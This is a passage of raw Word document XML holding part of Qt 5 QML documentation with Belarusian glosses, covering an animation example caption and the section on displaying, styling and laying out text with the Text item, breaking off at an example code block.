w:rsidR="00B75670">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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png"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"http://doc.qt.io/qt-5/images/qml-uses-animation.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1031" type="#_x0000_t75" alt="" style="width:237.3pt;height:5in">
            <v:imagedata r:id="rId498" r:href="rId499"/>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00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00305129" w:rsidRDefault="00305129" w:rsidP="00D72F99">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Прыклад запуску анімацыі са зне і прыклад анімацыйных цыклаў.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D72F99" w:rsidRDefault="00D72F99" w:rsidP="00D72F99">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>More information about animations can be found on the</w:t>
      </w:r>
      <w:r w:rsidR="00C21832">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId500" w:history="1">
        <w:r w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Important Concepts in Qt Quick - States, Transitions and Animations</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C21832">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72F99" w:rsidRPr="00D72F99" w:rsidRDefault="00D72F99" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00305129" w:rsidRDefault="00490E7E" w:rsidP="00305129">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId501" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00305129">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtdoc/qtquick-usecase-text.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00C21832" w:rsidRDefault="00305129" w:rsidP="00C21832">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="658" w:name="_Toc483000670"/>
      <w:bookmarkStart w:id="659" w:name="_Toc483003687"/>
      <w:bookmarkStart w:id="660" w:name="_Toc483604023"/>
      <w:bookmarkStart w:id="661" w:name="_Toc483605243"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use Case - Displaying Text In QML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="658"/>
      <w:bookmarkEnd w:id="659"/>
      <w:bookmarkEnd w:id="660"/>
      <w:bookmarkEnd w:id="661"/>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00305129" w:rsidRDefault="00305129" w:rsidP="00C21832">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="662" w:name="displaying-and-formatting-text"/>
      <w:bookmarkStart w:id="663" w:name="_Toc483000671"/>
      <w:bookmarkStart w:id="664" w:name="_Toc483003688"/>
      <w:bookmarkStart w:id="665" w:name="_Toc483604024"/>
      <w:bookmarkStart w:id="666" w:name="_Toc483605244"/>
      <w:bookmarkEnd w:id="662"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Displaying and Formatting Text</w:t>
      </w:r>
      <w:bookmarkEnd w:id="663"/>
      <w:bookmarkEnd w:id="664"/>
      <w:bookmarkEnd w:id="665"/>
      <w:bookmarkEnd w:id="666"/>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00305129" w:rsidRDefault="00305129" w:rsidP="00305129">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To display text in QML, create a </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> item and set the </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> property to the text you wish to display. The Text item will now display that text.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00305129" w:rsidRDefault="00305129" w:rsidP="00305129">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Several properties can be set on the Text item </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to style</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the entire block of text. These include color, font family, font size, bold and italic. For a full list of properties, consult the</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId502" w:anchor="text" w:history="1">
        <w:r w:rsidRPr="00305129">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00305129" w:rsidRDefault="00305129" w:rsidP="00305129">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Rich text</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> like markup can be used to selectively style specific sections of text with a Text item</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">прызначэнне </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rich text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId503" w:anchor="textFormat-prop" w:history="1">
        <w:r w:rsidRPr="00305129">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text::textFormat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text.StyledText</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to use this functionality. More details are available in the documentation of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId504" w:anchor="text" w:history="1">
        <w:r w:rsidRPr="00305129">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00305129" w:rsidRDefault="00305129" w:rsidP="00C21832">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="667" w:name="laying-out-text"/>
      <w:bookmarkStart w:id="668" w:name="_Toc483000672"/>
      <w:bookmarkStart w:id="669" w:name="_Toc483003689"/>
      <w:bookmarkStart w:id="670" w:name="_Toc483604025"/>
      <w:bookmarkStart w:id="671" w:name="_Toc483605245"/>
      <w:bookmarkEnd w:id="667"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Laying Out Text</w:t>
      </w:r>
      <w:bookmarkEnd w:id="668"/>
      <w:bookmarkEnd w:id="669"/>
      <w:bookmarkEnd w:id="670"/>
      <w:bookmarkEnd w:id="671"/>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00305129" w:rsidRDefault="00305129" w:rsidP="00305129">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By default</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, Text will display the text as a single line unless it contains embedded newlines. To wrap the line, set the </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wrapMode</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> property and give the text an explicit width for it to wrap to. If the width or height is not explicitly set, reading these properties will return the parameters of the bounding rect of the text (if you have explicitly set width or height, you can still use paintedWidth and paintedHeight</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>With these parameters in mind, the Text can be positioned like any other Item.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00C21832" w:rsidRDefault="00305129" w:rsidP="00C21832">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="672" w:name="example-code"/>
      <w:bookmarkStart w:id="673" w:name="_Toc483000673"/>
      <w:bookmarkStart w:id="674" w:name="_Toc483003690"/>
      <w:bookmarkEnd w:id="672"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="673"/>
      <w:bookmarkEnd w:id="674"/>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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
